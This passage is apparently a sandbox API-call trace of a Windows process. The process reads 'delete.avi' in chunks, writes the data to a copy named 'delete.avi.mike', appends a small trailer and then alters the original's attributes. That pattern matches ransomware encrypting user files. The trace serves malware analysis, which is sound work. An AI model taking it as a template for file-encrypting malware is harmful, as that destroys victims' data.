[0044.789] GetFileType (hFile=0x264) returned 0x1 [0044.789] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x20a20 [0044.790] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.790] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.790] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.790] GetFileType (hFile=0x264) returned 0x1 [0044.790] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.790] GetFileType (hFile=0x264) returned 0x1 [0044.790] SetFilePointer (in: hFile=0x264, lDistanceToMove=143360, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x23000 [0044.790] ReadFile (in: hFile=0x264, lpBuffer=0x21cf0e8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21cf0e8*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.792] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", lpFilePart=0x0) returned 0x48 [0044.792] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.792] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.792] GetFileType (hFile=0x264) returned 0x1 [0044.792] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.792] GetFileType (hFile=0x264) returned 0x1 [0044.792] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x23220 [0044.792] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.792] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.792] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.792] GetFileType (hFile=0x264) returned 0x1 [0044.792] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.792] GetFileType (hFile=0x264) returned 0x1 [0044.793] SetFilePointer (in: hFile=0x264, lDistanceToMove=153600, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x25800 [0044.793] ReadFile (in: hFile=0x264, lpBuffer=0x21dc098, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21dc098*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.794] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", lpFilePart=0x0) returned 0x48 [0044.794] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.794] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.794] GetFileType (hFile=0x264) returned 0x1 [0044.794] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.794] GetFileType (hFile=0x264) returned 0x1 [0044.794] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x25a20 [0044.794] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.795] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.795] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.795] GetFileType (hFile=0x264) returned 0x1 [0044.795] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.795] GetFileType (hFile=0x264) returned 0x1 [0044.795] SetFilePointer (in: hFile=0x264, lDistanceToMove=163840, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x28000 [0044.795] ReadFile (in: hFile=0x264, lpBuffer=0x21e9048, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21e9048*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.796] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", lpFilePart=0x0) returned 0x48 [0044.796] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.796] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.796] GetFileType (hFile=0x264) returned 0x1 [0044.796] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.796] GetFileType (hFile=0x264) returned 0x1 [0044.796] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x28220 [0044.797] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.797] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.797] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.797] GetFileType (hFile=0x264) returned 0x1 [0044.797] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.797] GetFileType (hFile=0x264) returned 0x1 [0044.797] SetFilePointer (in: hFile=0x264, lDistanceToMove=174080, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2a800 [0044.797] ReadFile (in: hFile=0x264, lpBuffer=0x21f5ff8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21f5ff8*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.801] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", lpFilePart=0x0) returned 0x48 [0044.801] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.801] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.801] GetFileType (hFile=0x264) returned 0x1 [0044.801] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.801] GetFileType (hFile=0x264) returned 0x1 [0044.801] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2aa20 [0044.801] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.801] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.801] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.802] GetFileType (hFile=0x264) returned 0x1 [0044.802] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.802] GetFileType (hFile=0x264) returned 0x1 [0044.802] SetFilePointer (in: hFile=0x264, lDistanceToMove=184320, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2d000 [0044.802] ReadFile (in: hFile=0x264, lpBuffer=0x2202fa8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2202fa8*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.803] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", lpFilePart=0x0) returned 0x48 [0044.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.803] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.803] GetFileType (hFile=0x264) returned 0x1 [0044.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.803] GetFileType (hFile=0x264) returned 0x1 [0044.803] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2d220 [0044.804] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.804] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.804] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.804] GetFileType (hFile=0x264) returned 0x1 [0044.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.804] GetFileType (hFile=0x264) returned 0x1 [0044.804] SetFilePointer (in: hFile=0x264, lDistanceToMove=194560, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2f800 [0044.804] ReadFile (in: hFile=0x264, lpBuffer=0x220ff58, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x220ff58*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.805] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", lpFilePart=0x0) returned 0x48 [0044.805] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.805] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.805] GetFileType (hFile=0x264) returned 0x1 [0044.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.805] GetFileType (hFile=0x264) returned 0x1 [0044.806] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2fa20 [0044.806] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.806] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.806] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.806] GetFileType (hFile=0x264) returned 0x1 [0044.806] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.806] GetFileType (hFile=0x264) returned 0x1 [0044.806] SetFilePointer (in: hFile=0x264, lDistanceToMove=204800, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x32000 [0044.806] ReadFile (in: hFile=0x264, lpBuffer=0x221cf08, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x221cf08*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.808] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", lpFilePart=0x0) returned 0x48 [0044.808] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.808] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.808] GetFileType (hFile=0x264) returned 0x1 [0044.808] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.808] GetFileType (hFile=0x264) returned 0x1 [0044.808] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x32220 [0044.808] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.808] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.808] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.808] GetFileType (hFile=0x264) returned 0x1 [0044.808] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.809] GetFileType (hFile=0x264) returned 0x1 [0044.809] SetFilePointer (in: hFile=0x264, lDistanceToMove=215040, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x34800 [0044.809] ReadFile (in: hFile=0x264, lpBuffer=0x2229eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2229eb8*, lpNumberOfBytesRead=0x2af080*=0x2400, lpOverlapped=0x0) returned 1 [0044.810] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", lpFilePart=0x0) returned 0x48 [0044.810] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.810] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.810] GetFileType (hFile=0x264) returned 0x1 [0044.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.810] GetFileType (hFile=0x264) returned 0x1 [0044.810] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x34a20 [0044.810] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", lpFilePart=0x0) returned 0x48 [0044.810] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0044.810] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.811] GetFileType (hFile=0x264) returned 0x1 [0044.811] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0044.811] GetFileType (hFile=0x264) returned 0x1 [0044.812] WriteFile (in: hFile=0x264, lpBuffer=0x2237f68*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x2237f68*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0044.812] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.812] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", lpFilePart=0x0) returned 0x48 [0044.812] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0044.812] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4de2620, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4de2620, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4ea0d00, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x36e20)) returned 1 [0044.812] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0044.812] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.812] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", lpFilePart=0x0) returned 0x48 [0044.812] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0044.812] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2239684 | out: lpFileInformation=0x2239684*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4de2620, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4de2620, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4ea0d00, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x36e20)) returned 1 [0044.812] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0044.813] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.813] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", dwFileAttributes=0x80) returned 0 [0044.814] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.814] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike", lpFilePart=0x0) returned 0x48 [0044.814] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0044.814] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0a4 | out: lpFileInformation=0x2af0a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4de2620, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4de2620, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4ea0d00, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x36e20)) returned 1 [0044.814] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0044.814] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpFilePart=0x0) returned 0x43 [0044.814] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft 